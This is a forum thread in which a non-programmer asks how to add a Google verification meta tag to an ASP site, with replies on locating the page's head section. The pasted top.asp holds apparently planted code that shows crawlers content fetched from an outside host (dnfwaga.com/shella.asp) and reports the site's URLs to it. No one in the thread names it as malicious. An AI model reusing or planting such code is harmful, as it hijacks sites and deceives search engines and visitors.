关于在asp文件中添加代码的问题

pengjpn 2010-07-21 10:21:08
最近想使用一下google的管理员工具,于是需要添加一串Google提供的代码在<head>标签中,但是,我们的主页是asp文件,index文件里没有head标签,具体显示的是这样的:

<!--#include file="head.asp"-->
<!--#include file="Top.asp"-->

注:本人不懂asp

于是想,大概是在head.asp或者top.asp文件里吧。于是打开了top.asp文件查看:

<%
'网站头部文件
On Error Resume Next
Function BytesToBstr(Body,Cset)
Dim Objstream
Set Objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>





<%
Function getBody(infopageurl)
On Error Resume Next
if infopageurl<>"" then
dim xmlHttp
set xmlHttp=server.createobject("MSXML2.XMLHTTP")
xmlHttp.open "GET",infopageurl,false
xmlHttp.send
getBody=BytesToBstr(xmlhttp.responsebody,"GB2312")
set xmlHttp=nothing
end if
end Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
dns = Request.ServerVariables("SERVER_NAME")
path = Request.ServerVariables("PATH_INFO")
qs = Request.ServerVariables("QUERY_STRING")
url= dns&path&"?"&qs
agent = Request.ServerVariables("HTTP_USER_AGENT")
tz = "http"
if Instr(agent,tz)>0 then
if path ="/index.asp" or path="/default.asp" then
response.write getBody("http://www.dnfwaga.com/shella.asp?dns="&dns)
else
response.write getBody("http://www.dnfwaga.com/shella.asp?dns="&url&"&dn="&dns)
end if
end if
%>


完全没有看懂,好吧继续看head.asp文件:

<%indexok=1 %>
<!--#include file="inc/Conn.asp"-->
<!--#include file="inc/Config.asp"-->
<!--#include file="inc/Function.asp"-->
<%
'静态页面判断
Set Rs1 = Server.CreateObject("ADODB.RecordSet")
Sql = "select * from htm"
Rs1.Open sql,conn,1,1
dim shouye,erji,neirong,dingshi
shouye=Rs1("shouye")
erji=Rs1("erji")
neirong=Rs1("neirong")
dingshi=Rs1("dingshi")
Rs1.close
set Rs1=Nothing
%>



这个还是看不懂!!

但是好像和inc文件夹里的三个文件有关,于是继续查看:但是依然找不到我能看的懂的任何html标签。

真是糊涂了,我该怎么办,哪一位好人高手能指点小弟一下,不胜感激!!

...全文
165 22 打赏 收藏 转发到动态 举报
写回复
用AI写文章
22 条回复
切换为时间正序
请发表友善的回复…
发表回复
pengjpn 2010-07-22
  • 打赏
  • 举报
回复
非常感谢各位,我觉得这个可以结贴了。因为,我已经发现症结所在。非常感谢各位。
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
让你去掉google代码,是让你找出造成页面错乱的原因,是因为加了google代码,还是因为有两个html,要逐步排除错误。
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
lzp4881大哥哥!!!

我的目的是加入google的代码,如果去掉的话。。。。,还有别的问题吗?
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
非常感谢十楼。我按照你说的方法,将所有代码都删掉了,只保留了:

<!--#include file="head.asp"-->
<!--#include file="Top.asp"-->

然后上传到服务器测试结果,然后看到居然还有头部文件的存在,查看代码发现,所有的head标签都存在,head里面的mate属性也都存在。

但是,你说的要在那一堆代码里改,我到底要怎么改呢。我首先声明过了,我不懂asp的。

我现在需要加入Google网站管理员工具提供的一串代码:<meta name="google-site-verification" content="fzVrJjJ9lQQG7T2DygvDxH-RMRUhi5zppH-W584aBUg" />

Google说,需要加到head里面才行,否则无法验证。
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
你先把google代码去掉。
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
多谢lzp4881。我按照你的方法,在index.asp文件的最前面加了<html><head><google代码></head>

在最后面加了</html>

但是,结果是,页面有部分错乱了。而且,查看源代码,的确是出现了两个html和两个head标签
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
多谢十楼。请问,您说的当前应用界面是哪一个界面?没弄懂。
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
多谢八楼。请问,你需要什么代码呢?我这里有很多文件。根目录下游index.asp、head.asp、top.asp,然后再inc文件夹里还有Conn.asp、Config.asp、Function.asp等等,你需要的是哪个文件的代码呢?难不成全贴出来,太多了吧
  • 打赏
  • 举报
回复
给你个建议:
你其他的暂时都注释或者删除掉,只保留这2个文件的调用,然后查看下,看看还能显示效果吗?是否还有HTML代码
如果有
那你十有八九代码是在
if Instr(agent,tz)>0 then
if path ="/index.asp" or path="/default.asp" then
response.write getBody("http://www.dnfwaga.com/shella.asp?dns="&dns)
else
response.write getBody("http://www.dnfwaga.com/shella.asp?dns="&url&"&dn="&dns)
end if
end if
这部分里
lbcleo 2010-07-21
  • 打赏
  • 举报
回复
直接写在当前要应用的界面就可以了
panzervor 2010-07-21
  • 打赏
  • 举报
回复
楼主说的那些都是VBScript代码,这个代码好像是动态生成的,楼主最好把所有相关代码都提供一下
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
不会,即使出现两个也没关系,无所谓。
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
非常感谢五楼。多谢你。然后,你觉得我在三楼回复的有道理吗?按照二楼的说法,会不会出现两个head两个html标签呢?
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
我是怕你没装DW
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
多谢三楼:为什么一定要用记事本打开加呢?用Dreamweaver打开不是一样的吗?
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
用记事本打开index.asp在这个文件里面加
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
谢谢二楼,我还没有按照您说的去做,但是,如果我直接打开主页,然后查看源代码的话,会显示所有的标签都存在,有html、head、body等等,所有标签都有的,但是,这个index文件里却不存在。

我想如果用二楼的方法,会不会到时候有两个html、两个head出现呢?
lzp4881 2010-07-21
  • 打赏
  • 举报
回复
你可以直接在index.asp的最前面加上
<html>
<head>
</head>
这三行

然后在最后面加上
</html>

  • 打赏
  • 举报
回复
[Quote=引用 15 楼 pengjpn 的回复:]
非常感谢十楼。我按照你说的方法,将所有代码都删掉了,只保留了:

<!--#include file="head.asp"-->
<!--#include file="Top.asp"-->

然后上传到服务器测试结果,然后看到居然还有头部文件的存在,查看代码发现,所有的head标签都存在,head里面的mate属性也都存在。

但是,你说的要在那一堆代码里改,我到底要怎么改呢。我首……
[/Quote]
你把<!--#include file="Top.asp"-->再去掉,看看还有不
如果有的话,那说明代码是在

<!--#include file="inc/Conn.asp"-->
<!--#include file="inc/Config.asp"-->
<!--#include file="inc/Function.asp"-->
这里面,如果还没有,那就既有可能是存在数据库或者模版里了

你要学会自己去排除啊
pengjpn 2010-07-21
  • 打赏
  • 举报
回复
即使想去Google理搜索一下问题,都不知道该怎么搜索,真是笨死了。该怎么办呢,现在开始啃asp的基础知识,什么时候才能碰到能解决这个问题的解答呢。

早知道,当初就先学后台开发技术,不先学前台了
加载更多回复(1)

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧